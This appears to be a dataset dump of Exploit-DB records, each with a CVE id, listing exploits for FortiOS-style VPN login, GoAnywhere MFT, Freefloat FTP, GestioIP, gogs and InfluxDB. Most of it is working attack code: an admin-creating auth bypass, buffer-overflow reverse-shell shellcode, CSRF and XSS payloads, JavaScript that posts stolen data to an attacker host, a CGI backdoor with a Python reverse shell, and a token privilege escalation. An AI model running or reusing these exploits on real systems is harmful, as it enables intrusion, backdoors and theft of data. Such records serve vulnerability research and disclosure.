attempt_login(self):\n \"\"\"Attempt to authenticate with provided credentials\"\"\"\n try:\n print(\"[*] Attempting authentication...\")\n\n self.session = requests.Session()\n self.session.verify = False\n\n # Get login page first\n self.session.get(f\"{self.base_url}/remote/login?lang=en\", timeout=self.timeout)\n\n # Attempt login\n login_data = {\n \"ajax\": \"1\",\n \"username\": self.username,\n \"realm\": self.realm,\n \"credential\": self.password\n }\n\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n\n response = self.session.post(f\"{self.base_url}/remote/logincheck\",\n data=login_data, headers=headers,\n timeout=self.timeout)\n\n # Check if login was successful\n if re.search(r\"\\bret=1\\b\", response.text) and \"/remote/hostcheck_install\" in response.text:\n print(\"[+] Authentication successful!\")\n\n # Extract and display cookies\n cookies = requests.utils.dict_from_cookiejar(response.cookies)\n self.display_cookies(cookies, \"Login\")\n\n return True, cookies\n ", "cve_id": "CVE-2024-50562", "source": "exploitdb", "timestamp": "2025-06-20T00:00:00+00:00"} {"id": "07d375f99657221fcc92", "text": "Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass\n# Date: 2025-05-25\n# Exploit Author: @ibrahimsql\n# Exploit Author's github: https://github.com/ibrahimsql\n# Vendor Homepage: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft\n# Software Link: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft/free-trial\n# Version: < 7.4.1\n# Tested on: Kali Linux 2024.1\n# CVE: CVE-2024-0204\n# Description:\n# Fortra GoAnywhere MFT versions prior to 7.4.1 contain a critical authentication bypass vulnerability\n# that allows unauthenticated attackers to create an administrator account by exploiting a path traversal\n# vulnerability to access the initial account setup wizard. This exploit demonstrates two different\n# path traversal techniques to maximize successful exploitation across various server configurations.\n#\n# References:\n# - https://old.rapid7.com/blog/post/2024/01/23/etr-cve-2024-0204-critical-authentication-bypass-in-fortra-goanywhere-mft/\n# - https://www.tenable.com/blog/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-vulnerability\n# - https://nvd.nist.gov/vuln/detail/cve-2024-0204\n\nimport argparse\nimport concurrent.futures\nimport os\nimport socket\nimport sys\nfrom typing import List, Dict, Tuple, Optional, Union\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom colorama import Fore, Style, init\n\n# Initialize colorama for cross-platform colored output\ninit(autoreset=True)\n\n# Disable SSL warnings\nrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\n\n# Constants\nDEFAULT_TIMEOUT = 10\nMAX_THREADS = 10\nUSER_AGENT = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\"\nPRIMARY_EXPLOIT_PATH = \"/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml\"\nSECONDARY_EXPLOIT_PATH = \"/goanywhere/..;/wizard/InitialAccountSetup.xhtml\"\n\n\nclass Banner:\n @staticmethod\n def show():\n banner = f\"\"\"{Fore.CYAN}\n ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗\n██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ██╔═████╗╚════██╗██╔═████╗██║ ██║\n██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗██║██╔██║ █████╔╝██║██╔██║███████║\n██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝████╔╝██║██╔═══╝ ████╔╝██║╚════██║\n╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ╚██████╔╝███████╗╚██████╔╝ ██║\n ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═╝\n{Style.RESET_ALL}\n{Fore.GREEN}CVE-2024-0204 Exploit v1.0{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql{Style.RESET_ALL}\n\"\"\"\n print(banner)\n\n\nclass GoAnywhereExploit:\n def __init__(self, username: str, password: str, timeout: int = DEFAULT_TIMEOUT):\n self.username = username\n self.password = password\n self.timeout = timeout\n self.headers = {\"User-Agent\": USER_AGENT}\n self.vulnerable_targets = []\n self.non_vulnerable_targets = []\n self.error_targets = []\n\n def check_target(self, target: str) -> Dict:\n \"\"\"\n Check if target is vulnerable to CVE-2024-0204 and attempt to create an admin account\n\n Args:\n target: The target URL/domain to check\n\n Returns:\n Dict containing result information\n \"\"\"\n result = {\n \"target\": target,\n \"vulnerable\": False,\n \"message\": \"\",\n \"admin_created\": False,\n \"error\": None\n }\n\n # Try primary exploit path first\n primary_result = self._try_exploit_path(target, PRIMARY_EXPLOIT_PATH)\n if primary_result[\"vulnerable\"]:\n return primary_result\n\n # If primary path failed, try secondary exploit path\n print(f\"{Fore.BLUE}[*] {Style.RESET_ALL}Primary exploit path failed, trying alternative path...\")\n secondary_result = self._try_exploit_path(target, SECONDARY_EXPLOIT_PATH)\n if secondary_result[\"vulnerable\"]:\n return secondary_result\n\n # If both paths failed, target is not vulnerable\n print(f\"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable to CVE-2024-0204\")\n result[\"message\"] = \"Not vulnerable to CVE-2024-0204\"\n self.non_vulnerable_targets.append(target)\n return result\n\n def _try_exploit_path(self, target: str, exploit_path: str) -> Dict:\n \"\"\"\n Try to exploit the target using a specific exploit path\n\n Args:\n target: Target to exploit\n exploit_path: Path to use for exploitation\n\n Returns:\n Dict with exploitation results\n \"\"\"\n result = {\n \"target\": target,\n \"vulnerable\": False,\n \"message\": \"\",\n \"admin_created\": False,\n ", "cve_id": "CVE-2024-0204", "source": "exploitdb", "timestamp": "2025-05-29T00:00:00+00:00"} {"id": "0231b545aedad9f4ab36", "text": "Freefloat FTP Server 1.0 - Remote Buffer Overflow\n\n# Exploit Title: Freefloat FTP Server 1.0 - Remote Buffer Overflow\n# Date: 22 may 2025\n# Notification vendor: No reported\n# Discovery by: Fernando Mengali\n# LinkedIn: https://www.linkedin.com/in/fernando-mengali-273504142/\n# Version: 1.0\n# Tested on: Windows XP SP3 English - # Version 5.1 (Build 2600.xpsp.080413-2111 : Service Pack 3)\n# Vulnerability Type: Remote Buffer Overflow\n# CVE: CVE-2025-5548\n\n#offset: 246\n\n#badchars: \\x00\\x0a\\x0d\n\n#EIP: 0x7C86467B (JMP ESP)\n#Kernel32.dll\n\nuse IO::Socket::INET;\n\n# msfvenom -p windows/shell_reverse_tcp lhost=192.168.232.129 lport=4444 EXITFUNC=thread -b '\\x00\\x0a\\x0d' -a x86 --platform Windows -f perl\n# nc -vlp 4444\n# execute exploit\n\nmy $buf =\n\"\\xda\\xd4\\xbb\\x4e\\xd9\\xfd\\x96\\xd9\\x74\\x24\\xf4\\x58\\x2b\\xc9\" .\n\"\\xb1\\x52\\x31\\x58\\x17\\x83\\xc0\\x04\\x03\\x16\\xca\\x1f\\x63\\x5a\" .\n\"\\x04\\x5d\\x8c\\xa2\\xd5\\x02\\x04\\x47\\xe4\\x02\\x72\\x0c\\x57\\xb3\" .\n\"\\xf0\\x40\\x54\\x38\\x54\\x70\\xef\\x4c\\x71\\x77\\x58\\xfa\\xa7\\xb6\" .\n\"\\x59\\x57\\x9b\\xd9\\xd9\\xaa\\xc8\\x39\\xe3\\x64\\x1d\\x38\\x24\\x98\" .\n\"\\xec\\x68\\xfd\\xd6\\x43\\x9c\\x8a\\xa3\\x5f\\x17\\xc0\\x22\\xd8\\xc4\" .\n\"\\x91\\x45\\xc9\\x5b\\xa9\\x1f\\xc9\\x5a\\x7e\\x14\\x40\\x44\\x63\\x11\" .\n\"\\x1a\\xff\\x57\\xed\\x9d\\x29\\xa6\\x0e\\x31\\x14\\x06\\xfd\\x4b\\x51\" .\n\"\\xa1\\x1e\\x3e\\xab\\xd1\\xa3\\x39\\x68\\xab\\x7f\\xcf\\x6a\\x0b\\x0b\" .\n\"\\x77\\x56\\xad\\xd8\\xee\\x1d\\xa1\\x95\\x65\\x79\\xa6\\x28\\xa9\\xf2\" .\n\"\\xd2\\xa1\\x4c\\xd4\\x52\\xf1\\x6a\\xf0\\x3f\\xa1\\x13\\xa1\\xe5\\x04\" .\n\"\\x2b\\xb1\\x45\\xf8\\x89\\xba\\x68\\xed\\xa3\\xe1\\xe4\\xc2\\x89\\x19\" .\n\"\\xf5\\x4c\\x99\\x6a\\xc7\\xd3\\x31\\xe4\\x6b\\x9b\\x9f\\xf3\\x8c\\xb6\" .\n\"\\x58\\x6b\\x73\\x39\\x99\\xa2\\xb0\\x6d\\xc9\\xdc\\x11\\x0e\\x82\\x1c\" .\n\"\\x9d\\xdb\\x05\\x4c\\x31\\xb4\\xe5\\x3c\\xf1\\x64\\x8e\\x56\\xfe\\x5b\" .\n\"\\xae\\x59\\xd4\\xf3\\x45\\xa0\\xbf\\x3b\\x31\\x42\\xbe\\xd4\\x40\\x92\" .\n\"\\xd0\\x78\\xcc\\x74\\xb8\\x90\\x98\\x2f\\x55\\x08\\x81\\xbb\\xc4\\xd5\" .\n\"\\x1f\\xc6\\xc7\\x5e\\xac\\x37\\x89\\x96\\xd9\\x2b\\x7e\\x57\\x94\\x11\" .\n\"\\x29\\x68\\x02\\x3d\\xb5\\xfb\\xc9\\xbd\\xb0\\xe7\\x45\\xea\\x95\\xd6\" .\n\"\\x9f\\x7e\\x08\\x40\\x36\\x9c\\xd1\\x14\\x71\\x24\\x0e\\xe5\\x7c\\xa5\" .\n\"\\xc3\\x51\\x5b\\xb5\\x1d\\x59\\xe7\\xe1\\xf1\\x0c\\xb1\\x5f\\xb4\\xe6\" .\n\"\\x73\\x09\\x6e\\x54\\xda\\xdd\\xf7\\x84\\x1f\\xd2\\x90\\x6e\\x70\\xeb\" .\n\"\\x82\\x52\\x75\\x11\\x7b\\x02\\x0c\\x9f\\x7b\\x6c\\x48\\x37\\x2a\\x59\" .\n\"\\x07\\x94\\x51\\xcc\\xde\\xc5\\x30\\x84\\x22\\x97\\x58\\x0e\\x12\\x72\" .\n\"\\x5a\\x1a\\x4b\\x9a\\x5a\\x7c\\x4e\\x04\\x2e\\x14\\x48\\xbc\\x67\\x9b\" .\n\"\\x9d\\x6c\\xa9\\x79\\x0f\\x4f\\x08\\xbd\\x2e\\xec\\xaa\\x45\\x64\\x09\" .\n\"\\xe2\\x98\\x56\\x62\\xde\\x65\\xf2\\x48\\x4e\\xec\\x79\\x1b\\x4c\\x9d\" .\n\"\\xa5\\xda\\x47\\xd3\\xa5\\x53\\xa3\\xaa\\x52\\x11\\x25\\xdb\\x6a\\x62\" .\n\"\\xc3\\x5a\\x3a\\x90\\xab\\x70\\x4e\\x74\\x4a\\x12\\xae\\x53\\x54\\xda\" .\n\"\\x38\\x90\\x70\\x58\\x98\\xac\\x2b\\xdb\\x7c\\x48\\x5f\\x1e\\x4a\\x4a\" .\n\"\\x1e\\x84\\x28\";\n\nmy $offset = 246; # Será substituído depois\nmy $eip = pack('V', 0x7c86467b); # Endereço JMP ESP little endian\nmy $nop = \"\\x90\" x 20;\n\nmy $padding = \"A\" x $offset;\nmy $payload = $padding . $eip . $nop . $buf;\n\nmy $socket = IO::Socket::INET->new(\n PeerAddr => '192.168.232.135',\n PeerPort => '21',\n Proto => 'tcp'\n) or die \"Failed to connect: $!\\n\";\n\nprint \"Connected to FTP server\\n\";\n\nmy $response = \"\";\n$response = <$socket>; # banner inicial do FTP\n\nprint $socket \"USER anonymous\\r\\n\";\n$response = <$socket>;\nprint $socket \"PASS anonymous\\r\\n\";\n$response = <$socket>;\n\nprint $socket \"NOOP $payload\\r\\n\";\n$response = <$socket>;\n\nprint \"Payload sent, check your listener.\\n\";\n\nclose $socket;", "cve_id": "CVE-2025-5548", "source": "exploitdb", "timestamp": "2025-06-13T00:00:00+00:00"} {"id": "8c20954bbda22aff31c8", "text": "GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)\n\n# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)\n# Exploit Author: m4xth0r (Maximiliano Belino)\n# Author website: https://maxibelino.github.io/\n# Author email : max.cybersecurity at belino.com\n# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858\n# Date: 2025-01-13\n# Vendor Homepage: https://www.gestioip.net/\n# Software Link: https://www.gestioip.net/en/download/\n# Version: GestioIP v3.5.7\n# Tested on: Kali Linux\n# CVE: CVE-2024-50858\n\n### Description\n\nThe GestioIP application has many endpoints and they are vulnerable to CSRF. This allows an attacker to execute actions through the admin's browser on the application if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application.\n\n### Prerequisites\n\nThe option \"Manage - Manage GestioIP - User Management\" must be enabled previously.\n\n\n### Usage\n\nTo exploit this vulnerability, an attacker must host ```payload.html``` on an attacker-controlled web server (python3 -m http.server 8090). When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator.\n\n\n### File: payload.html\n#### example: editing user named 'maxi'\n\n\n\n\n\n\n\nWelcome to our site\n\n\n\n
\n

Thank you for visiting our site!

\n

We are processing your request, please wait a moment...

\n\"Processing...\"\n
\n\n\n\n\n\n
\n\n\n\n\n\n\n\n\n
\n\n\n", "cve_id": "CVE-2024-50858", "source": "exploitdb", "timestamp": "2025-04-14T00:00:00+00:00"} {"id": "27eaa3b07044e0ac4fce", "text": "GestioIP 3.5.7 - Cross-Site Scripting (XSS)\n\n# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Scripting (XSS)\n# Exploit Author: m4xth0r (Maximiliano Belino)\n# Author website: https://maxibelino.github.io/\n# Author email (max.cybersecurity at belino.com)\n# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50857\n# Date: 2025-01-13\n# Vendor Homepage: https://www.gestioip.net/\n# Software Link: https://www.gestioip.net/en/download/\n# Version: GestioIP v3.5.7\n# Tested on: Kali Linux\n# CVE: CVE-2024-50857\n\n### Description\n\nThe `\"ip_do_job\"` feature of GestioIP 3.5.7 is vulnerable to XSS, leading to data exfiltration and CSRF attacks. Two examples are described below.\n\n### Prerequisites\n\nTo successfully exploit the XSS vulnerability, the user must be part of a \"User Group\" that has the following three permissions:\n\n• Show backuped device configurations (read_device_config_perm)\n• Upload device configurations (write_device_config_perm)\n• Administrate CM (administrative_cm_perm)\n\n\n\n1) vulnerable parameter: `host_id`\n\nhttp://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&host_id=''\n\n\n2) vulnerable parameter: `stored_config`\n\nhttp://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&stored_config=''", "cve_id": "CVE-2024-50857", "source": "exploitdb", "timestamp": "2025-04-14T00:00:00+00:00"} {"id": "9047e39deffb155a0b8d", "text": "GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)\n\n# Exploit Title: GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)\n# Exploit Author: m4xth0r (Maximiliano Belino)\n# Author website: https://maxibelino.github.io/\n# Author email (max.cybersecurity at belino.com)\n# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50859\n# Date: 2025-01-13\n# Vendor Homepage: https://www.gestioip.net/\n# Software Link: https://www.gestioip.net/en/download/\n# Version: GestioIP v3.5.7\n# Tested on: Kali Linux\n# CVE: CVE-2024-50859\n\n### Description\n\nThe ip_import_acl_csv request is vulnerable to Reflected XSS (Reflected Cross-Site Scripting); the user can upload a file and the file content is reflected in the HTML response without being sanitized. If the file uploaded by the user has an incorrect format and an error occurs during its processing, part of the file's content may be displayed in the browser. If this content includes HTML or scripts and it is not properly escaped, the browser could interpret it, leading to a security vulnerability. This could allow data exfiltration and enabling CSRF (Cross-Site Request Forgery) attacks.\nProper input validation and output encoding are critical to prevent this vulnerability.\n\n\n### Prerequisites\n\nEnable (set to 'yes') the parameter:\n\nManage > Manage GestioIP > ACL connection management\n\n\n### Usage\n\nSelect: import/export > Import ACLs/ACL Connections\n\nSelect: \"Connection List\"\n\nSelect \"report only\"\n\nBrowse to select the file you want to upload.\n\nClick 'upload'\n\n\n\n### Payloads\n\n#### 1) html file to upload\n\n\n\n\n#### 2) js file to exfiltrate data\n\nvar req1 = new XMLHttpRequest();\nreq1.open('GET',\"http://localhost/gestioip/res/ip_show_user.cgi\", false);\nreq1.send();\n\nresponse = req1.responseText;\n\nvar req2 = new XMLHttpRequest();\nreq2.open('POST', \"http://10.20.0.1:8000/steal_data\", false);\nreq2.setRequestHeader('Content-Type', 'text/html');\nreq2.send(response);", "cve_id": "CVE-2024-50859", "source": "exploitdb", "timestamp": "2025-04-14T00:00:00+00:00"} {"id": "2f5dbc4ee422d6d749da", "text": "GestioIP 3.5.7 - Remote Command Execution (RCE)\n\n# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)\n# Exploit Author: m4xth0r (Maximiliano Belino)\n# Author website: https://maxibelino.github.io/\n# Author email (max.cybersecurity at belino.com)\n# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760\n# Date: 2025-01-13\n# Vendor Homepage: https://www.gestioip.net/\n# Software Link: https://www.gestioip.net/en/download/\n# Version: GestioIP v3.5.7\n# Tested on: Kali Linux\n# CVE: CVE-2024-48760\n\nimport requests\nimport sys\n\n# Config\nusername = \"gipadmin\"\npassword = \"PASSWORD\"\ndomain = \"localhost\"\nlocal_ip = \"10.20.0.1\"\nlocal_port = 443\ntarget_url = f\"http://{domain}/gestioip/api/upload.cgi\"\n\n# CGI Backdoor Perl\nbackdoor_code = \"\"\"#!/usr/bin/perl -w\n\nuse strict;\n\nprint \"Cache-Control: no-cache\\\\n\";\nprint \"Content-type: text/html\\\\n\\\\n\";\n\nmy $req = $ENV{QUERY_STRING};\nchomp ($req);\n$req =~ s/%20/ /g;\n$req =~ s/%3b/;/g;\n$req =~ s/%7c/|/gi;\n$req =~ s/%27/'/g;\n$req =~ s/%22/\"/g;\n$req =~ s/%5D/]/g;\n$req =~ s/%5B/[/g;\n\nprint \"\";\nprint '';\n\nif (!$req) {\n print \"Usage: http://domain/gestioip/api/upload.cgi?whoami\";\n} else {\n print \"Executing: $req\";\n}\n\nprint \"
\";\nmy @cmd = `$req`;\nprint \"
\";\n\nforeach my $line (@cmd) {\n print $line . \"
\";\n}\n\nprint \"\";\n\"\"\"\n\n# Exploit functions\ndef upload_file(session, file_name, file_data):\n \"\"\"Uploads the file to the server\"\"\"\n files = {\n 'file_name': (None, file_name),\n 'leases_file': (file_name, file_data)\n }\n response = session.post(target_url, files=files)\n if \"OK\" not in response.text:\n print(f\"[!] Error uploading {file_name}.\")\n sys.exit(1)\n return response\n\ndef run_command(session, cmd):\n \"\"\"Execute a command in the server through the vuln\"\"\"\n url = target_url + '?' + cmd\n resp = session.get(url)\n print(resp.text)\n\ndef backdoor_exists(session):\n \"\"\"Verifies if backdoor is already uploaded or not\"\"\"\n response = session.get(target_url + \"?whoami\")\n if \"www-data\" in response.text:\n return True # backdoor already uploaded\n return False # backdoor not uploaded yet\n\nif __name__ == '__main__':\n with requests.Session() as session:\n session.auth = (username, password)\n\n # Verify if backdoor is already uploaded\n if not backdoor_exists(session):\n print(\"\\n[!] Uploading backdoor...\\n\")\n upload_file(session, 'upload.cgi', backdoor_code)\n else:\n print(\"\\n[+] Backdoor already uploaded. Continue...\\n\")\n\n # Execute the reverse shell\n print(\"\\n[!] Executing reverse shell...\\n\")\n reverse_shell_cmd = f'python3 -c \"import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\\'{local_ip}\\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\\'/bin/sh\\', \\'-i\\']);\"'\n run_command(session, reverse_shell_cmd)", "cve_id": "CVE-2024-48760", "source": "exploitdb", "timestamp": "2025-04-14T00:00:00+00:00"} {"id": "41ea3e2d78e8cddbaccb", "text": "GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS)\n\n# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Stored Cross-Site Scripting\n# Exploit Author: m4xth0r (Maximiliano Belino)\n# Author website: https://maxibelino.github.io/\n# Author email: max.cybersecurity at belino.com\n# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50861\n# Date: 2025-01-13\n# Vendor Homepage: https://www.gestioip.net/\n# Software Link: https://www.gestioip.net/en/download/\n# Version: GestioIP v3.5.7\n# Tested on: Kali Linux\n# CVE: CVE-2024-50861\n\n### Description\n\nThe http://localhost/gestioip/res/ip_mod_dns_key_form.cgi feature of GestioIP 3.5.7 is vulnerable to Stored XSS. An authenticated attacker with appropriate permissions can inject malicious code into the tsig_key form field and save it to the database. Once saved, any user who accesses the \"DNS Key\" page will trigger the Stored XSS, leading to the execution of malicious code.\n\n### Prerequisites\n\n1. Enable \"DNS Key\" Feature\nFirst, ensure that \"Dynamic DNS updates\" is enabled in the global configuration:\n\nManage > Manage GestioIP > Global Configuration > Dynamic DNS updates enabled: yes\n\nThis will enable the following menus:\n\n Manage > DNS Keys\n Manage > DNS Update User\n\n2. Create a DNS Key Entry\n\nTo create a new DNS key entry and also edit an existing one, the user must belong to a group with the \"Manage Sites And Categories\" permission. By default, \"Admin\" and \"GestioIP Admin\" groups have this permission.\n\nAlso, you can configure this permission to any group under:\n\nManage > User Groups > Manage Sites and Categories\n\n3. Enter payload.\n\nOnce group permission is set, input one of the following payloads into the \"TSIG Key\" (tsig_key) field and save it.\n\n\n### Payloads\n\n1 - Test basic XSS\n\n\n\n\n2 - Send data (cookies) to the attacker's server\n\n\n\n\n3 - Redirect the user to a malicious site\n\n", "cve_id": "CVE-2024-50861", "source": "exploitdb", "timestamp": "2025-04-14T00:00:00+00:00"} {"id": "3021b0c66af8030e936b", "text": "gogs 0.13.0 - Remote Code Execution (RCE)\n\n# Exploit Title: gogs 0.13.0 - Remote Code Execution (RCE)\n# Date: 27th June, 2025\n# Exploit Author: Ardayfio Samuel Nii Aryee\n# Software link: https://github.com/gogs/gogs.git\n# Version: gogs <=0.13.0\n# Tested on: Ubuntu\n# CVE: CVE-2024-39930\n\n\n# ===============================\n# Example Usage:\n# python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub \"touch /tmp/pwned\"\n# python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub \"curl http://atacker.com\" --ssh-port 2222\n# ===============================\n\nimport requests\nimport paramiko\nimport base64\nimport random\nimport string\nimport sys\nimport argparse\nfrom urllib.parse import urlparse\n\nAPI_BASE_URL = \"\"\n\ndef generate_random_string(length=8, charset=None):\n if charset is None:\n charset = string.ascii_letters + string.digits\n return ''.join(random.choices(charset, k=length))\n\ndef make_headers(token=None, basic_auth=None):\n headers = {\"Content-Type\": \"application/json\"}\n if token:\n headers[\"Authorization\"] = f\"token {token}\"\n elif basic_auth:\n b64 = base64.b64encode(basic_auth.encode()).decode()\n headers[\"Authorization\"] = f\"Basic {b64}\"\n return headers\n\ndef http_post(path, json=None, headers=None):\n url = f\"{API_BASE_URL}{path}\"\n response = requests.post(url, json=json, headers=headers)\n response.raise_for_status()\n return response\n\ndef http_get(path, headers=None):\n url = f\"{API_BASE_URL}{path}\"\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n return response\n\ndef http_delete(path, headers=None):\n url = f\"{API_BASE_URL}{path}\"\n response = requests.delete(url, headers=headers)\n response.raise_for_status()\n return response\n\ndef obtain_api_token(username, password):\n auth = f\"{username}:{password}\"\n headers = make_headers(basic_auth=auth)\n data = {\"name\": generate_random_string()}\n\n try:\n response = http_post(f\"/users/{username}/tokens\", json=data, headers=headers)\n token = response.json()['sha1']\n print(f\"[+] API Token Acquired: {token}\")\n return token\n except Exception as e:\n print(f\"[!] Failed to obtain API token: {e}\")\n sys.exit(1)\n\ndef create_repo(token):\n repo_name = generate_random_string()\n headers = make_headers(token=token)\n data = {\n \"name\": repo_name,\n \"description\": \"Auto-created repository\",\n \"private\": False\n }\n\n try:\n response = http_post(\"/user/repos\", json=data, headers=headers)\n full_name = response.json()['full_name']\n print(f\"[+] Repository Created: {full_name}\")\n return full_name\n except Exception as e:\n print(f\"[!] Failed to create repository: {e}\")\n sys.exit(1)\n\ndef delete_existing_ssh_keys(token):\n headers = make_headers(token=token)\n try:\n response = http_get(\"/user/keys\", headers=headers)\n keys = response.json()\n for key in keys:\n key_id = key['id']\n http_delete(f\"/user/keys/{key_id}\", headers=headers)\n print(f\"[+] Deleted SSH Key ID: {key_id}\")\n except Exception as e:\n print(f\"[!] Failed to delete existing SSH keys: {e}\")\n sys.exit(1)\n\ndef add_ssh_key(public_key_path, token):\n delete_existing_ssh_keys(token)\n\n try:\n with open(public_key_path, 'r') as f:\n key = f.read()\n except Exception as e:\n print(f\"[!] Failed to read public key file: {e}\")\n sys.exit(1)\n\n headers = make_headers(token=token)\n data = {\n \"title\": generate_random_string(),\n \"key\": key\n }\n\n try:\n response = http_post(\"/user/keys\", json=data, headers=headers)\n print(f\"[+] SSH Key Added: {response.status_code}\")\n except Exception as e:\n print(f\"[!] Failed to add SSH key: {e}\")\n sys.exit(1)\n\ndef exploit(ssh_user, ssh_host, ssh_port, private_key_path, repo_path, command):\n try:\n key = paramiko.RSAKey.from_private_key_file(private_key_path)\n except Exception as e:\n print(f\"[!] Failed to load SSH key: {e}\")\n sys.exit(1)\n\n try:\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(hostname=ssh_host, port=int(ssh_port), username=ssh_user, pkey=key)\n\n session = client.get_transport().open_session()\n\n print(\"[+] Executing command...... \")\n session.set_environment_variable(\"--split-string\", command)\n session.exec_command(f\"git-upload-pack {repo_path}\")\n\n stdout = session.makefile('rb', 1024)\n stderr = session.makefile_stderr('rb', 1024)\n\n print(\"STDERR:\", stderr.read().decode())\n print(\"STDOUT:\", stdout.read().decode())\n\n session.close()\n client.close()\n except Exception as e:\n print(f\"[!] Error: {e}\")\n sys.exit(1)\n\ndef main():\n global API_BASE_URL\n\n parser", "cve_id": "CVE-2024-39930", "source": "exploitdb", "timestamp": "2025-07-02T00:00:00+00:00"} {"id": "e86128c41222ff08f1b7", "text": "InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation\n\n# Exploit Title: InfluxDB OSS Operator Privilege Escalation via BusinessLogic Flaw\n# Date: 22/03/2024\n# Exploit Author: Andrea Pasin (Xenom0rph97)\n# Researcher Homepage: https://xenom0rph97.github.io/xeno/\n# GitHub Exploit repo: https://github.com/XenoM0rph97/CVE-2024-30896\n# Software Link: https://www.influxdata.com/products/influxdb/\n# Version: 2.x <=> 2.7.11\n# Tested on: InfluxDB OSS 2.x\n# CVE: CVE-2024-30896\n# CVSS Base Score: 9.1\n# CVSS v3.1 Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\n\n# CVE-2024-30896\n\n## Summary\nA business logic flaw in influxdb allows users who own a valid allAccess\ntoken to escalate their privileges at operator level by listing current\nauthorization tokens.\n\n## Scenario\nAttacker might be a user which was gained access by an administrator via an\nallAccess token only within their organization.\nThis user's permissions will allow full control over the organization but\nwill still prevent him to interact with other orgs.\n\n## Impact\nThis vulnerability would allow a user to obtain unrestricted access to the\ninfluxdb instance. A similar condition might fully compromise\nConfidentiality, Integrity and Availability of data owned by users of\ndifferent organizations. Additionally, since operator token has\nadministrative permissions, Availability and Integrity of the entire\ninfluxdb instance might be compromised.\n\n## Prerequisites/Limitations\n1. Attacker must have a valid allAccess token\n2. allAccess token must have been created in the same Org where an operator\ntoken resides (ex. same Org as Admin user)\n3. Attacker must be able to interact with influxdb instance via CLI or APIs\n(influxClient)\n\n## Steps to Reproduce\n### Case 1: Exploitation via influxdb APIs:\n*Python Version*: 3\n*Requirements*: `influxdb_client==1.41.0`\n*Script usage*\n```\n% python3 ./CVE-2024-30896.py -h\nusage: CVE-2024-30896.py [-h] [-t TOKEN] [-e ENDPOINTURL] [-v [VERBOSE]]\n[-vv [VVERBOSE]]\n\noptional arguments:\n-h, --help show this help message and exit\n-t TOKEN, --token TOKEN\nCustom or allAccess token to access influx DB\ninstance\n-e ENDPOINTURL, --endpointUrl ENDPOINTURL\nEndpoint Url of influxdb instance (ex. \"\nhttps://myInfluxdbInstance:8086/\")\n-v [VERBOSE], --verbose [VERBOSE]\nEnable verbose logging - INFO\n-vv [VVERBOSE], --vverbose [VVERBOSE]\nEnable verbose logging - DEBUG\n```\n\n### Case 2: Exploitation via influx CLI\n1. Execute: `influx auth ls -t | grep write:/orgs`. This\nwill list all current active operator tokens on the influxdb instance.\n\n*Example*\n```\n# Using an allAccess token\ninflux auth ls -t U1OuqmFC{REDACTED} | grep U1OuqmFC{REDACTED}\n\n0cc41c3b050e5000 U1OuqmFC{REDACTED}\nadmin 0cb9c92ee228b000 [read:orgs/87d0746948a3b3f5/authorizations\nwrite:orgs/87d0746948a3b3f5/authorizations\nread:orgs/87d0746948a3b3f5/buckets write:orgs/87d0746948a3b3f5/buckets\nread:orgs/87d0746948a3b3f5/dashboards\nwrite:orgs/87d0746948a3b3f5/dashboards read:/orgs/87d0746948a3b3f5\nread:orgs/87d0746948a3b3f5/sources 